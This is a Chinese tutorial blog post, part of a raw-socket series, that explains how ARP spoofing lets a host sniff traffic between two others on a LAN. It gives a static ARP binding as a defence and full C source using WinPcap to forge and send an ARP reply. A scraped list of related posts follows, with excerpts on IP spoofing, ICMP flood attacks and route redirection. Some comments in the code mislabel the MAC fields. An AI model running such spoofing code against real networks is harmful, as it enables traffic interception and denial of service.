ARP欺骗(原始套接字系列八)

ARP欺骗的原理可简单的解释如下:假设有三台主机A,B,C位于同一个交换式局域网中,监听者处于主机A,而主机B,C正在通信。现在A希望能嗅探到B->C的数据,于是A就可以伪装成C对B做ARP欺骗--向B发送伪造的ARP应答包,应答包中IP地址为C的IP地址而MAC地址为A的MAC地址。 这个应答包会刷新B的ARP缓存,让B认为A就是C,说详细点,就是让B认为C的IP地址映射到的MAC地址为主机A的MAC地址。这样,B想要发送给C的数据实际上却发送给了A,就达到了嗅探的目的。我们在嗅探到数据后,还必须将此数据转发给C,这样就可以保证B,C的通信不被中断。以上就是基于ARP欺骗的嗅探基本原理,在这种嗅探方法中,嗅探者A实际上是插入到了B->C中,B的数据先发送给了A,然后再由A转发给C,其数据传输关系如下所示:

  B----->A----->C 
  B<----A<------C

  Windows系统中缓存了目前的MAC地址与IP地址之间的映射,通过arp -a命令可以获得,如下图:

  笔者的电脑IP地址为192.168.1.2,通过网关192.168.1.1到达公网。当某人用"网络剪刀手"或"网络执法官"一类的软件给笔者发送伪造的ARP报文后,笔者的Windows会缓存一个错误的网关MAC地址。由于IP包最终要通过MAC地址寻址到192.168.1.1网关进行转发,而本机对192.168.1.1 MAC地址的记录已经是错的了,这样,IP包将无法到达网关,笔者将不能再连接Internet,这就是恼人的"网络剪刀手"的工作原理。如果受到了恶意的ARP欺骗,我们只需要将网关的IP地址与MAC地址在本机静态绑定,运行如下命令:

  ARP -s 192.168.1.1 00-33-44-57-17-a3

  再看看此时的ARP缓存:

  192.168.1.1一项由dynamic变成了static。

  实现ARP欺骗最重要的是要组建一个ARP报文并发送给要欺骗的目标主机,下面的源代码演示了这个过程:

#define EPT_IP 0x0800/* type: IP*/
#define EPT_ARP 0x0806/* type: ARP */
#define EPT_RARP 0x8035/* type: RARP */
#define ARP_HARDWARE 0x0001/* Dummy type for 802.3 frames */
#define ARP_REQUEST 0x0001/* ARP request */
#define ARP_REPLY 0x0002/* ARP reply */ 
#define Max_Num_Adapter 10

#pragma pack(push, 1)

typedef struct ehhdr
{
 unsigned chareh_dst[6]; /* destination ethernet addrress */
 unsigned chareh_src[6]; /* source ethernet addresss */
 unsigned shorteh_type; /* ethernet pachet type*/
} EHHDR, *PEHHDR;

typedef struct arphdr
{
 unsigned shortarp_hrd; /* format of hardware address */
 unsigned shortarp_pro; /* format of protocol address */
 unsigned chararp_hln; /* length of hardware address */
 unsigned chararp_pln; /* length of protocol address */
 unsigned shortarp_op; /* ARP/RARP operation */

 unsigned chararp_sha[6]; /* sender hardware address */
 unsigned longarp_spa; /* sender protocol address */
 unsigned chararp_tha[6]; /* target hardware address */
 unsigned longarp_tpa; /* target protocol address */
} ARPHDR, *PARPHDR;

typedef struct arpPacket
{
 EHHDRehhdr;
 ARPHDRarphdr;
} ARPPACKET, *PARPPACKET;

#pragma pack(pop)

int main(int argc, char *argv[])
{
 static char AdapterList[Max_Num_Adapter][1024];
 char szPacketBuf[600];
 char MacAddr[6];

 LPADAPTERlpAdapter;
 LPPACKETlpPacket;
 WCHARAdapterName[2048];
 WCHAR *temp, *temp1;
 ARPPACKET ARPPacket;

 ULONG AdapterLength = 1024;
 
 int AdapterNum = 0;
 int nRetCode, i;

 //Get The list of Adapter
 if (PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE)
 {
  printf("Unable to retrieve the list of the adapters!\n");
  return 0;
 }

 temp = AdapterName;
 temp1 = AdapterName;
 i = 0;
 while ((*temp != ‘\0‘) || (*(temp - 1) != ‘\0‘))
 {
  if (*temp == ‘\0‘)
  {
   memcpy(AdapterList[i], temp1, (temp - temp1) *2);
   temp1 = temp + 1;
   i++;
  }
  temp++;
 }

 AdapterNum = i;
 for (i = 0; i < AdapterNum; i++)
  wprintf(L "\n%d- %s\n", i + 1, AdapterList[i]);
  printf("\n");

 //Default open the 0
 lpAdapter = (LPADAPTER)PacketOpenAdapter((LPTSTR)AdapterList[0]);
 //取第一个网卡

 if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
 {
  nRetCode = GetLastError();
  printf("Unable to open the driver, Error Code : %lx\n", nRetCode);
  return 0;
 }

 lpPacket = PacketAllocatePacket();
 if (lpPacket == NULL)
 {
  printf("\nError:failed to allocate the LPPACKET structure.");
  return 0;
 }

 ZeroMemory(szPacketBuf, sizeof(szPacketBuf));

 if (!GetMacAddr("BBBBBBBBBBBB", MacAddr))
 {
  printf("Get Mac address error!\n");
 }
 memcpy(ARPPacket.ehhdr.eh_dst, MacAddr, 6); //源MAC地址

 if (!GetMacAddr("AAAAAAAAAAAA", MacAddr))
 {
  printf("Get Mac address error!\n");
  return 0;
 }
 memcpy(ARPPacket.ehhdr.eh_src, MacAddr, 6); //目的MAC地址。(A的地址)

 ARPPacket.ehhdr.eh_type = htons(EPT_ARP);

 ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE);
 ARPPacket.arphdr.arp_pro = htons(EPT_IP);
 ARPPacket.arphdr.arp_hln = 6;
 ARPPacket.arphdr.arp_pln = 4;
 ARPPacket.arphdr.arp_op = htons(ARP_REPLY);

 if (!GetMacAddr("DDDDDDDDDDDD", MacAddr))
 {
  printf("Get Mac address error!\n");
  return 0;
 }
 memcpy(ARPPacket.arphdr.arp_sha, MacAddr, 6); //伪造的C的MAC地址
 ARPPacket.arphdr.arp_spa = inet_addr("192.168.10.3"); //C的IP地址

 if (!GetMacAddr("AAAAAAAAAAAA", MacAddr))
 {
  printf("Get Mac address error!\n");
  return 0;
 }
 memcpy(ARPPacket.arphdr.arp_tha, MacAddr, 6); //目标A的MAC地址
 ARPPacket.arphdr.arp_tpa = inet_addr("192.168.10.1"); //目标A的IP地址

 memcpy(szPacketBuf, (char*) &ARPPacket, sizeof(ARPPacket));
 PacketInitPacket(lpPacket, szPacketBuf, 60);

 if (PacketSetNumWrites(lpAdapter, 2) == FALSE)
 {
  printf("warning: Unable to send more than one packet ina single write ! \
n ");
 }

 if (PacketSendPacket(lpAdapter, lpPacket, TRUE) == FALSE)
 {
  printf("Error sending the packets!\n"); return 0;
 }

 printf("Send ok!\n");

 // close the adapter and exit
 PacketFreePacket(lpPacket); 
 PacketCloseAdapter(lpAdapter); 
 return 0;
}

  上述程序中使用了著名的开放项目Winpcap(The Packet Capture and Network Monitoring Library for Windows)中的API,项目网址为:http://www.winpcap.org/。Winpcap是UNIX下的libpcap移植到Windows下的产物,工作于驱动(Driver)层,能以很高的效率进行网络操作。其提供的packet.dll中包含了多个功能强大的函数,我们聊举几例:

  LPPACKET PacketAllocatePacket(void);

  如果运行成功,返回一个_PACKET结构的指针,否则返回NULL。成功返回的结果将会传送到PacketReceivePacket()函数,接收来自驱动的网络数据报。

  LPADAPTER PacketOpetAdapter(LPTSTR AdapterName);

  打开一个网络适配器。

  VOID PacketCloseAdapter(LPADAPTER lpAdapter);

  关闭参数中提供的网络适配器,释放相关的ADAPTER结构。

  VOID PacketFreePacket(LPPACKET lpPacket);

  释放参数提供的_PACKET结构。

  BOOLEAN PacketGetAdapterNames(LPSTR pStr,PULONG BufferSize);

  返回可以得到的网络适配器列表及描述。

  BOOLEAN PacketReceivePacket(LPADAPTER AdapterObject,LPPACKET lpPacket,BOOLEAN Sync);

  从NPF驱动程序读取网络数据报及统计信息。

  数据报编码结构: |bpf_hdr|data|Padding|bpf_hdr|data|Padding|
BOOLEAN PacketSendPacket(LPADAPTER AdapterObject,LPPACKET lpPacket, BOOLEAN Sync);

  发送一个或多个数据报的副本。

  我们用Depends工具打开pakcet.dll,如下图:

  目前,网络剪刀手、网络执法官的软件在底层都用到了Winpcap。本节的例程代码中,看不到关于socket的内容,实际上已经在Winpcap中实现了。Winpcap的源代码可以直接在http://www.winpcap.org/下载。

ARP欺骗(原始套接字系列八)

时间: 2024-10-14 14:01:03

ARP欺骗(原始套接字系列八)的相关文章

ip欺骗(原始套接字系列九)

由于使用Raw Socket的时候,IP报头可完全由程序员自定义,所以我们可以任意地修改本地发送包的IP地址,使得接收方错误的认为IP报文是由欺骗地址发出的. 下面的程序演示了向某目标发送IP地址伪装的UDP报文的过程: void sendPesuoIpUDP(void){ WSADATA wsd; if (WSAStartup(MAKEWORD(2, 2), &wsd) != 0) { printf("WSAStartup() failed: %d ", GetLastErr

SNIFF(原始套接字系列六)

大家知道,以太网采用广播机制,所有与网络连接的工作站都可以看到网络上传递的数据.通过查看包含在帧中的目标地址,确定是否进行接收或放弃.如果证明数据确实是发给自己的,工作站将会接收数据并传递给高层协议进行处理.但是,如果让网卡置于混杂模式(Promiscuous mode),则网卡不会鉴别帧的MAC地址,而是一律接收. 上图给出了以太网的帧格式,网卡是通过图中的MAC地址进行ID标识的.传说中的网络嗅探(sniffer)就是指让网卡进入混杂模式从而接收正在局域网总线上发送的所有报文.为什么能够嗅探

原始套接字简介(原始套接字系列一)

大多数程序员所接触到的套接字(Socket)为两类: (1)流式套接字(SOCK_STREAM):一种面向连接的Socket,针对于面向连接的TCP服务应用: (2)数据报式套接字(SOCK_DGRAM):一种无连接的Socket,对应于无连接的UDP服务应用. 从用户的角度来看,SOCK_STREAM.SOCK_DGRAM这两类套接字似乎的确涵盖了TCP/IP应用的全部,因为基于TCP/IP的应用,从协议栈的层次上讲,在传输层的确只可能建立于TCP或UDP协议之上(图1),而SOCK_STRE

ICMP拒绝服务攻击(原始套接字系列四)

拒绝服务攻击(DoS)企图通过使被攻击的计算机资源消耗殆尽从而不能再提供服务,拒绝服务攻击是最容易实施的攻击行为.中美黑客大战中的中国黑客一般对美进行的就是拒绝服务攻击,其技术手段大多不够高明. ICMP实现拒绝服务攻击的途径有二:一者"单刀直入",一者"借刀杀人".具体过程分析如下:   ICMPFLOOD攻击 大量的 ICMP消息发送给目标系统,使得它不能够对合法的服务请求做出响应.中美黑客大战中的多数中国黑客采用的正是此项技术.ICMP FLOOD攻击实际上是

原始套接字基础(原始套接字系列二)

在进入Raw Socket多种强大的应用之前,我们先讲解怎样建立一个Raw Socket及怎样用建立的Raw Socket发送和接收IP包. 建立Raw Socket 在Windows平台上,为了使用Raw Socket,需先初始化WINSOCK: // 启动 WinsockWSAData wsaData;if (WSAStartup(MAKEWORD(2, 1), &wsaData) != 0){ cerr << "Failed to find Winsock 2.1 or

ping的实现(原始套接字系列三)

使用Raw Socket实现Ping 仅仅采用ICMP.DLL并不能完全实现ICMP灵活多变的各类报文,只有使用Raw Socket才是ICMP的终极解决之道. 使用Raw Socket发送ICMP报文前,我们要完全依靠自己的代码组装报文: //功能:初始化ICMP的报头, 给data部分填充数据, 计算校验和void init_ping_packet(ICMPHeader *icmp_hdr, int packet_size, int seq_no){ //设置ICMP报头字段 icmp_hd

linux原始套接字(1)-arp请求与接收

一.概述                                                   以太网的arp数据包结构: arp结构op操作参数:1为请求,2为应答. 常用的数据结构如下: 1.物理地址结构位于netpacket/packet.h 1 struct sockaddr_ll 2 { 3 unsigned short int sll_family; 4 unsigned short int sll_protocol; 5 int sll_ifindex; 6 unsi

路由器欺骗(原始套接字五)

Windows系统保持着一张已知的路由器列表,我们可以使用route PRINT命令显示路由表,下面是笔者的电脑运行route PRINT命令后的结果: 列表中到达某目的节点的第一项Gateway为默认路由器,如果默认路由器关闭,则位于列表第二项的路由器成为缺省路由器.缺省路由向发送者报告另一条到特定主机的更短路由,就是ICMP重定向.攻击者可利用ICMP重定向报文破坏路由,并伪装成路由器截获所有到某些目标网络或全部目标网络的IP数据包,进行窃听. 显然,前文中我们只是讲解了发送ICMP Pin

原始套接字-1

原始套接字-1 2010-05-20 00:13:16|  分类: 计算机与 Interne |字号 订阅 大多数程序员所接触到的套接字(Socket)为两类: (1)流式套接字(SOCK_STREAM):一种面向连接的Socket,针对于面向连接的TCP服务应用: (2)数据报式套接字(SOCK_DGRAM):一种无连接的Socket,对应于无连接的UDP服务应用. 从用户的角度来看,SOCK_STREAM.SOCK_DGRAM这两类套接字似乎的确涵盖了TCP/IP应用的全部,因为基于TCP/